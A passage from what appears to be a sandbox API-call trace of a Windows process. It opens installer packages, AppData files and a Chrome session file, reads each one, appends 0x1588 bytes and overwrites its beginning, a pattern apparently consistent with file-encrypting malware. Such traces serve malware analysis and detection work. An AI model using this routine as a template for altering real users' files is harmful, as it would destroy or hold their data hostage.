lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0135.984] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x22000 [0135.984] ReadFile (in: hFile=0x204, lpBuffer=0x2668268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0136.032] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x22000 [0136.033] WriteFile (in: hFile=0x204, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0136.033] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0136.033] WriteFile (in: hFile=0x204, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x345f28c*=0x8000, lpOverlapped=0x0) returned 1 [0136.034] CloseHandle (hObject=0x204) returned 1 [0136.034] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0136.035] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0136.035] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x24000 [0136.035] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0136.035] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.035] ReleaseMutex (hMutex=0x168) returned 1 [0136.035] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeMinimum_x86.msi", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0136.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeMinimum_x86.msi", cchWideChar=25, lpMultiByteStr=0x1f8fcfc, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vc_runtimeMinimum_x86.msi", lpUsedDefaultChar=0x0) returned 25 [0136.036] ReadFile (in: hFile=0x204, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0136.056] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x23000 [0136.056] ReadFile (in: hFile=0x204, lpBuffer=0x1e943a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0136.106] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x23000 [0136.106] WriteFile (in: hFile=0x204, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0136.106] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0136.107] WriteFile (in: hFile=0x204, lpBuffer=0x289f178*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x289f178*, lpNumberOfBytesWritten=0x345f28c*=0x8000, lpOverlapped=0x0) returned 1 [0136.107] CloseHandle (hObject=0x204) returned 1 [0136.107] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x204 [0136.109] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0136.109] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x23000 [0136.109] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0136.110] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.110] ReleaseMutex (hMutex=0x168) returned 1 [0136.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeMinimum_x64.msi", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0136.110] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeMinimum_x64.msi", cchWideChar=25, lpMultiByteStr=0x1f8fc6c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vc_runtimeMinimum_x64.msi", lpUsedDefaultChar=0x0) returned 25 [0136.110] ReadFile (in: hFile=0x204, lpBuffer=0x2882db8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0136.113] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x22000 [0136.113] ReadFile (in: hFile=0x204, lpBuffer=0x2668268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0136.128] SetFilePointer (in: hFile=0x204, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x22000 [0136.128] WriteFile (in: hFile=0x204, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0136.129] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0136.129] WriteFile (in: hFile=0x204, lpBuffer=0x289f178*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x289f178*, lpNumberOfBytesWritten=0x345f28c*=0x8000, lpOverlapped=0x0) returned 1 [0136.129] CloseHandle (hObject=0x204) returned 1 [0136.129] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0136.621] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0136.621] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x25000 [0136.622] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0136.622] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.622] ReleaseMutex (hMutex=0x168) returned 1 [0136.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeMinimum_x64.msi", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0136.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeMinimum_x64.msi", cchWideChar=25, lpMultiByteStr=0x1f8fc6c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vc_runtimeMinimum_x64.msi", lpUsedDefaultChar=0x0) returned 25 [0136.622] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0136.643] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x24000 [0136.643] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0136.664] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x24000 [0136.664] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0136.665] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0136.665] WriteFile (in: hFile=0x1dc, lpBuffer=0x2872188*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2872188*, lpNumberOfBytesWritten=0x345f28c*=0x8000, lpOverlapped=0x0) returned 1 [0136.665] CloseHandle (hObject=0x1dc) returned 1 [0136.665] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\vc_redist.x86.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0136.666] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0136.666] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xbee30 [0136.667] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0136.667] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.667] ReleaseMutex (hMutex=0x168) returned 1 [0136.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VC_redist.x86.exe", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VC_redist.x86.exe", cchWideChar=17, lpMultiByteStr=0x1f88bcc, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VC_redist.x86.exe", lpUsedDefaultChar=0x0) returned 17 [0136.667] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x345f278*=0xf000, lpOverlapped=0x0) returned 1 [0136.748] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0136.767] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xbde30 [0136.768] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0136.770] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xbde30 [0136.770] WriteFile (in: hFile=0x1dc, lpBuffer=0x288a348*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x288a348*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0136.771] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0136.771] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x345f28c*=0xf000, lpOverlapped=0x0) returned 1 [0136.771] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0136.772] CloseHandle (hObject=0x1dc) returned 1 [0136.776] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\SharedDataEvents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\shareddataevents"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0136.778] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0136.778] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1400 [0136.779] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0136.779] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.779] ReleaseMutex (hMutex=0x168) returned 1 [0136.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SharedDataEvents", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0136.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SharedDataEvents", cchWideChar=16, lpMultiByteStr=0x1f88bcc, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SharedDataEvents", lpUsedDefaultChar=0x0) returned 16 [0136.779] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x1400, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x345f2bc*=0x1400, lpOverlapped=0x0) returned 1 [0136.895] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0136.895] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x1988, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x345f2d0*=0x1988, lpOverlapped=0x0) returned 1 [0136.896] CloseHandle (hObject=0x1dc) returned 1 [0136.896] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap.exe.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0136.898] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0136.898] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x354b [0136.898] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0136.898] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.899] ReleaseMutex (hMutex=0x168) returned 1 [0136.899] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="clickonce_bootstrap.exe.manifest", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0136.899] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="clickonce_bootstrap.exe.manifest", cchWideChar=32, lpMultiByteStr=0x1fa55f4, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="clickonce_bootstrap.exe.manifest", lpUsedDefaultChar=0x0) returned 32 [0136.899] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0137.706] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x254b [0137.706] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0137.833] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x254b [0137.834] WriteFile (in: hFile=0x1dc, lpBuffer=0x289dad8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x289dad8*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0137.834] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0137.834] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0137.834] CloseHandle (hObject=0x1dc) returned 1 [0137.838] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0137.840] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0137.840] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1a918 [0137.840] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0137.840] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0137.840] ReleaseMutex (hMutex=0x168) returned 1 [0137.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GDIPFONTCACHEV1.DAT", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0137.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GDIPFONTCACHEV1.DAT", cchWideChar=19, lpMultiByteStr=0x1f88bcc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GDIPFONTCACHEV1.DAT", lpUsedDefaultChar=0x0) returned 19 [0137.841] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0137.938] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x19918 [0137.939] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0137.960] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x19918 [0137.960] WriteFile (in: hFile=0x1dc, lpBuffer=0x289bad8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x289bad8*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0137.960] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0137.960] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0137.960] CloseHandle (hObject=0x1dc) returned 1 [0138.011] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Current Session" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\current session"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0138.012] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0138.012] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: 